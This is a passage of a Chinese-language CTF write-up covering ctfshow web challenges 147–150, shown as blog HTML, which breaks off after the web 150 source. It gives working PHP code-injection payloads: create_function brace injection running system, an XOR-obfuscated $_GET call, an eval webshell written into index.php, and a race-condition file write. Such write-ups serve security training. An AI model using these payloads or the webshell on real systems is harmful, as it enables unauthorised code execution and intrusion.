class="variable">$myfile</span>,<span class="variable">$b</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//echo $c;</span></span><br><span class="line">&#125;</span><br><span 
class="line">fclose(<span class="variable">$myfile</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后复制本题目代码本地搭建：开始寻找命中字符</p>
<p>先构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">create_function(&#x27;&#x27;,$_GET[&#x27;show&#x27;])</span><br><span class="line">相当于定义了一个匿名函数 function lambda() &#123;</span><br><span class="line">	&#125;echo &quot;yn8rt&quot;;//</span><br><span class="line">&#125;</span><br><span class="line">所以：</span><br><span class="line">create_function(&#x27;&#x27;,&#x27;&#125;echo &quot;yn8rt&quot;;//&#x27;)</span><br><span class="line">payload:</span><br><span class="line">?show=&#125;echo &quot;yn8rt&quot;;//</span><br><span class="line">post:ctf=&lt;这里放待fuzz的字符&gt;create_function</span><br></pre></td></tr></table></figure>

<p>开始fuzz：</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9d8148dd7353af8c807d7e233b2a3037.png" alt="img"></p>
<p>payload：</p>
<p>?show=}system(‘tac f*’);//</p>
<p>ctf=%5ccreate_function</p>
<p>而 %5c 其实就是反斜杠 \：</p>
<p>PHP 的默认命名空间是 \，所有的函数和类都位于 \ 这个全局命名空间中。如果直接写函数名 function_name() 来调用，其实相当于写了一个相对路径；而写成 \function_name() 来调用，则相当于写了一个绝对路径。如果在其他 namespace 中调用系统类，就必须使用这种绝对路径的写法。</p>
<h1 id="web-148"><a href="#web-148" class="headerlink" title="web 148"></a>web 148</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[A-Za-z0-9_\%\\|\~\&#x27;\,\.\:\@\&amp;\*\+\- ]+/&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    @<span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span 
class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_ctfshow_fl0g</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">code=$哈=&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;;$&#123;$哈&#125;[哼]($&#123;$哈&#125;[嗯]);&amp;哼=system&amp;嗯=tac f*</span><br><span class="line">&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;; 异或出来的结果是 _GET</span><br><span class="line">$&#123;_GET&#125;[哼]($&#123;_GET&#125;[嗯]);&amp;哼=call_user_func&amp;嗯=get_ctfshow_fl0g</span><br></pre></td></tr></table></figure>

<p>这里直接利用回调，调用题目中现成的函数来读取 flag.php</p>
<h1 id="web-149"><a href="#web-149" class="headerlink" title="web 149"></a>web 149</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$files</span> = scandir(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">            unlink(<span class="variable">$file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">   
 &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">file_put_contents(<span class="variable">$_GET</span>[<span class="string">&#x27;ctf&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;show&#x27;</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$files</span> = scandir(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">            unlink(<span class="variable">$file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>方法一：</p>
<p>你不删除index.php，那么我就往index.php中写个木马</p>
<pre><code>?ctf=index.php
show=&lt;?php @eval($_POST[&#39;yn8rt&#39;]);?&gt;
</code></pre>
<p>方法二：</p>
<p>条件竞争：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?ctf=1.php</span><br><span class="line">show=&lt;?php system(&#x27;tac /f*&#x27;);?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-150"><a href="#web-150" class="headerlink" title="web 150"></a>web 150</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span 
class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CTFSHOW</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$username</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$password</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$vip</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$secret</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;vip = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;secret = <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;secret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">isVIP</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;vip?<span class="literal">TRUE</span>:<span class="literal">FALSE</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span 
class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__autoload</span>(<span class="params"><span class="variable">$class</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$class</span>))&#123;</span><br><span class="line">            <span class="variable">$class</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">#过滤字符</span></span><br><span class="line"><span class="variable">$key</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\_| |\[|\]|\?/&#x27;</span>, <span class="variable">$key</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$ctf</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>];</span><br><span class="line">extract(<span class="variable">$_GET</span>);</span><br><span class="line"><span class="keyword">if</span>(class_exists(<span class="variable">$__CTFSHOW__</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;class is exists!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$isVIP</span> &amp;&amp; strrpos(<span class="variable">$ctf</span>, <span class="string">&quot;:&quot;</span>)===<span class="literal">FALSE</span>)&#123;</span><br><span class="line">    <span class="keyword">include</span>(<span 
class="variable">$ctf</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
